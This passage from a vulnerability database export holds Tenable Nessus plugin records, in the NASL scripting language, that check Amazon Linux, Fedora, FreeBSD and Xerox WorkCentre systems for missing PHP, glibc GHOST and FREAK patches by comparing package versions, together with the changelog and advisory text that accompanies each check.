value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php55-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-bcmath-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-cli-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-common-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-dba-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-debuginfo-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-devel-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-embedded-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-enchant-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-fpm-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gd-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gmp-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-imap-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-intl-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-ldap-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mbstring-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mcrypt-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mssql-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mysqlnd-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-odbc-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-opcache-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pdo-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pgsql-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-process-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pspell-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-recode-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-snmp-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-soap-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-tidy-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xml-5.5.22-1.98.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xmlrpc-5.5.22-1.98.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php55 / php55-bcmath / php55-cli / php55-common / php55-dba / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:06", "description": "19 Feb 2015, PHP 5.6.6\n\nCore :\n\n - Removed support for multi-line headers, as the are deprecated by RFC 7230. (Stas)\n\n - Fixed bug #67068 (getClosure returns somethings that's not a closure). (Danack at basereality dot com)\n\n - Fixed bug #68942 (Use after free vulnerability in unserialize() with DateTimeZone). (CVE-2015-0273) (Stas)\n\n - Fixed bug #68925 (Mitigation for CVE-2015-0235 ' GHOST: glibc gethostbyname buffer overflow). (Stas)\n\n - Fixed Bug #67988 (htmlspecialchars() does not respect default_charset specified by ini_set) (Yasuo)\n\n - Added NULL byte protection to exec, system and passthru. (Yasuo)\n\nDba :\n\n - Fixed bug #68711 (useless comparisons). (bugreports at internot dot info)\n\nEnchant :\n\n - Fixed bug #68552 (heap buffer overflow in enchant_broker_request_dict()). (Antony)\n\nFileinfo :\n\n - Fixed bug #68827 (Double free with disabled ZMM).\n (Joshua Rogers)\n\n - Fixed bug #67647 (Bundled libmagic 5.17 does not detect quicktime files correctly). (Anatol)\n\n - Fixed bug #68731 (finfo_buffer doesn't extract the correct mime with some gifs). (Anatol)\n\nFPM :\n\n - Fixed bug #66479 (Wrong response to FCGI_GET_VALUES).\n (Frank Stolle)\n\n - Fixed bug #68571 (core dump when webserver close the socket). (redfoxli069 at gmail dot com, Laruence)\n\nLIBXML :\n\n - Fixed bug #64938 (libxml_disable_entity_loader setting is shared between threads). (Martin Jansen)\n\nMysqli :\n\n - Fixed bug #68114 (linker error on some OS X machines with fixed width decimal support) (Keyur Govande)\n\n - Fixed bug #68657 (Reading 4 byte floats with Mysqli and libmysqlclient has rounding errors) (Keyur Govande)\n\nOpcache :\n\n - Fixed bug with try blocks being removed when extended_info opcode generation is turned on. (Laruence)\n\nPDO_mysql :\n\n - Fixed bug #68750 (PDOMysql with mysqlnd does not allow the usage of named pipes). (steffenb198 at aol dot com)\n\nPhar :\n\n - Fixed bug #68901 (use after free). (bugreports at internot dot info)\n\nPgsql :\n\n - Fixed Bug #65199 (pg_copy_from() modifies input array variable) (Yasuo)\n\nSession :\n\n - Fixed bug #68941 (mod_files.sh is a bash-script) (bugzilla at ii.nl, Yasuo)\n\n - Fixed Bug #66623 (no EINTR check on flock) (Yasuo)\n\n - Fixed bug #68063 (Empty session IDs do still start sessions) (Yasuo)\n\nSqlite3 :\n\n - Fixed bug #68260 (SQLite3Result::fetchArray declares wrong required_num_args). (Julien)\n\nStandard :\n\n - Fixed bug #65272 (flock() out parameter not set correctly in windows). (Daniel Lowrey)\n\n - Fixed bug #69033 (Request may get env. variables from previous requests if PHP works as FastCGI). (Anatol)\n\nStreams :\n\n - Fixed bug which caused call after final close on streams filter. (Bob)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-02-24T00:00:00", "type": "nessus", "title": "Fedora 21 : php-5.6.6-1.fc21 (2015-2315)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-2315.NASL", "href": "https://www.tenable.com/plugins/nessus/81459", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2315.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81459);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2015-2315\");\n\n script_name(english:\"Fedora 21 : php-5.6.6-1.fc21 (2015-2315)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"19 Feb 2015, PHP 5.6.6\n\nCore :\n\n - Removed support for multi-line headers, as the are\n deprecated by RFC 7230. (Stas)\n\n - Fixed bug #67068 (getClosure returns somethings that's\n not a closure). (Danack at basereality dot com)\n\n - Fixed bug #68942 (Use after free vulnerability in\n unserialize() with DateTimeZone). (CVE-2015-0273)\n (Stas)\n\n - Fixed bug #68925 (Mitigation for CVE-2015-0235 '\n GHOST: glibc gethostbyname buffer overflow). (Stas)\n\n - Fixed Bug #67988 (htmlspecialchars() does not respect\n default_charset specified by ini_set) (Yasuo)\n\n - Added NULL byte protection to exec, system and\n passthru. (Yasuo)\n\nDba :\n\n - Fixed bug #68711 (useless comparisons). (bugreports at\n internot dot info)\n\nEnchant :\n\n - Fixed bug #68552 (heap buffer overflow in\n enchant_broker_request_dict()). (Antony)\n\nFileinfo :\n\n - Fixed bug #68827 (Double free with disabled ZMM).\n (Joshua Rogers)\n\n - Fixed bug #67647 (Bundled libmagic 5.17 does not\n detect quicktime files correctly). (Anatol)\n\n - Fixed bug #68731 (finfo_buffer doesn't extract the\n correct mime with some gifs). (Anatol)\n\nFPM :\n\n - Fixed bug #66479 (Wrong response to FCGI_GET_VALUES).\n (Frank Stolle)\n\n - Fixed bug #68571 (core dump when webserver close the\n socket). (redfoxli069 at gmail dot com, Laruence)\n\nLIBXML :\n\n - Fixed bug #64938 (libxml_disable_entity_loader setting\n is shared between threads). (Martin Jansen)\n\nMysqli :\n\n - Fixed bug #68114 (linker error on some OS X machines\n with fixed width decimal support) (Keyur Govande)\n\n - Fixed bug #68657 (Reading 4 byte floats with Mysqli\n and libmysqlclient has rounding errors) (Keyur\n Govande)\n\nOpcache :\n\n - Fixed bug with try blocks being removed when\n extended_info opcode generation is turned on. (Laruence)\n\nPDO_mysql :\n\n - Fixed bug #68750 (PDOMysql with mysqlnd does not allow\n the usage of named pipes). (steffenb198 at aol dot com)\n\nPhar :\n\n - Fixed bug #68901 (use after free). (bugreports at\n internot dot info)\n\nPgsql :\n\n - Fixed Bug #65199 (pg_copy_from() modifies input array\n variable) (Yasuo)\n\nSession :\n\n - Fixed bug #68941 (mod_files.sh is a bash-script)\n (bugzilla at ii.nl, Yasuo)\n\n - Fixed Bug #66623 (no EINTR check on flock) (Yasuo)\n\n - Fixed bug #68063 (Empty session IDs do still start\n sessions) (Yasuo)\n\nSqlite3 :\n\n - Fixed bug #68260 (SQLite3Result::fetchArray declares\n wrong required_num_args). (Julien)\n\nStandard :\n\n - Fixed bug #65272 (flock() out parameter not set\n correctly in windows). (Daniel Lowrey)\n\n - Fixed bug #69033 (Request may get env. variables from\n previous requests if PHP works as FastCGI). (Anatol)\n\nStreams :\n\n - Fixed bug which caused call after final close on streams\n filter. (Bob)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-February/150370.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f7e0c26f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"php-5.6.6-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-11T14:49:56", "description": "The PHP Project reports :\n\nUse after free vulnerability in unserialize() with DateTimeZone.\n\nMitigation for CVE-2015-0235 -- GHOST: glibc gethostbyname buffer overflow.", "cvss3": {}, "published": "2015-02-27T00:00:00", "type": "nessus", "title": "FreeBSD : php5 -- multiple vulnerabilities (f7a9e415-bdca-11e4-970c-000c292ee6b8) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php5", "p-cpe:/a:freebsd:freebsd:php55", "p-cpe:/a:freebsd:freebsd:php56", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_F7A9E415BDCA11E4970C000C292EE6B8.NASL", "href": "https://www.tenable.com/plugins/nessus/81559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81559);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-0235\", \"CVE-2015-0273\");\n\n script_name(english:\"FreeBSD : php5 -- multiple vulnerabilities (f7a9e415-bdca-11e4-970c-000c292ee6b8) (GHOST)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP Project reports :\n\nUse after free vulnerability in unserialize() with DateTimeZone.\n\nMitigation for CVE-2015-0235 -- GHOST: glibc gethostbyname buffer\noverflow.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.4.38\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.5.22\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://php.net/ChangeLog-5.php#5.6.6\"\n );\n # https://vuxml.freebsd.org/freebsd/f7a9e415-bdca-11e4-970c-000c292ee6b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d0ca766\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.4.38\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55<5.5.22\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56<5.6.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:05:06", "description": "According to its model number and software version, the remote Xerox WorkCentre 77XX device is affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability, known as FREAK (Factoring attack on RSA-EXPORT Keys), exists due to the support of weak EXPORT_RSA cipher suites with keys less than or equal to 512 bits. A man-in-the-middle attacker may be able to downgrade the SSL/TLS connection to use EXPORT_RSA cipher suites which can be factored in a short amount of time, allowing the attacker to intercept and decrypt the traffic. (CVE-2015-0204)\n\n - A heap-based buffer overflow condition exists in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions\n __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. This vulnerability is known as GHOST. (CVE-2015-0235)", "cvss3": {}, "published": "2015-12-11T00:00:00", "type": "nessus", "title": "Xerox WorkCentre 77XX Multiple Vulnerabilities (XRX15R) (FREAK) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0204", "CVE-2015-0235"], "modified": "2019-11-20T00:00:00", "cpe": ["cpe:/h:xerox:workcentre"], "id": "XEROX_XRX15R.NASL", "href": "https://www.tenable.com/plugins/nessus/87327", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87327);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\"CVE-2015-0204\", \"CVE-2015-0235\");\n script_bugtraq_id(71936, 72325);\n script_xref(name:\"CERT\", value:\"243585\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Xerox WorkCentre 77XX Multiple Vulnerabilities (XRX15R) (FREAK) (GHOST)\");\n script_summary(english:\"Checks system software version of Xerox WorkCentre devices.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote multi-function device is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its model number and software version, the remote Xerox\nWorkCentre 77XX device is affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability, known as FREAK\n (Factoring attack on RSA-EXPORT Keys), exists due to the\n support of weak EXPORT_RSA cipher suites with keys less\n than or equal to 512 bits. A man-in-the-middle attacker\n may be able to downgrade the SSL/TLS connection to use\n EXPORT_RSA cipher suites which can be factored in a\n short amount of time, allowing the attacker to intercept\n and decrypt the traffic. (CVE-2015-0204)\n\n - A heap-based buffer overflow condition exists in the GNU\n C Library (glibc) due to improper validation of\n user-supplied input to the glibc functions\n __nss_hostname_digits_dots(), gethostbyname(), and\n gethostbyname2(). This allows a remote attacker to cause\n a buffer overflow, resulting in a denial of service\n condition or the execution of arbitrary code. This\n vulnerability is known as GHOST. (CVE-2015-0235)\");\n # https://www.xerox.com/download/security/security-bulletin/1cd29-52276b40e059d/cert_Security_Mini-_Bulletin_XRX15R_for_WC77xx_v1-0.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?94c70bf4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.smacktls.com/#freak\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate cumulative update as described in the Xerox\nsecurity bulletin in the referenced URL.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:xerox:workcentre\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"xerox_workcentre_detect.nasl\");\n script_require_keys(\"www/xerox_workcentre\", \"www/xerox_workcentre/model\", \"www/xerox_workcentre/ssw\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Get model and system software version\nmodel = get_kb_item_or_exit(\"www/xerox_workcentre/model\");\nver = get_kb_item_or_exit(\"www/xerox_workcentre/ssw\");\n\nif (model =~ \"^77[0-9][0-9]$\")\n fix = \"061.090.225.25000\";\nelse\n audit(AUDIT_HOST_NOT, \"an affected Xerox WebCentre model\");\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, \"Xerox WorkCentre \" + model + \" System SW\", ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Model : Xerox WorkCentre ' + model +\n '\\n Installed system software version : ' + ver +\n '\\n Fixed system software version : ' + fix + '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:52:01", "description": "19 Feb 2015, PHP 5.5.22\n\nCore :\n\n - Fixed bug #67068 (getClosure returns somethings that's not a closure). (Danack at basereality dot com)\n\n - Fixed bug #68925 (Mitigation for CVE-2015-0235 ' GHOST: glibc gethostbyname buffer overflow). (Stas)\n\n - Fixed bug #68942 (Use after free vulnerability in unserialize() with DateTimeZone). (CVE-2015-0273) (Stas)\n\n - Added NULL byte protection to exec, system and passthru. (Yasuo)\n\n - Removed support for multi-line headers, as the are deprecated by RFC 7230. (Stas)\n\nDate :\n\n - Fixed bug #45081 (strtotime incorrectly interprets SGT time zone). (Derick)\n\nDba :\n\n - Fixed bug #68711 (useless comparisons). (bugreports at internot dot info)\n\nEnchant :\n\n - Fixed bug #6855 (heap buffer overflow in enchant_broker_request_dict()). (Antony)\n\nFileinfo :\n\n - Fixed bug #68827 (Double free with disabled ZMM).\n (Joshua Rogers)\n\nFPM :\n\n - Fixed bug #66479 (Wrong response to FCGI_GET_VALUES).\n (Frank Stolle)\n\n - Fixed bug #68571 (core dump when webserver close the socket). (redfoxli069 at gmail dot com, Laruence)\n\nLibxml :\n\n - Fixed bug #64938 (libxml_disable_entity_loader setting is shared 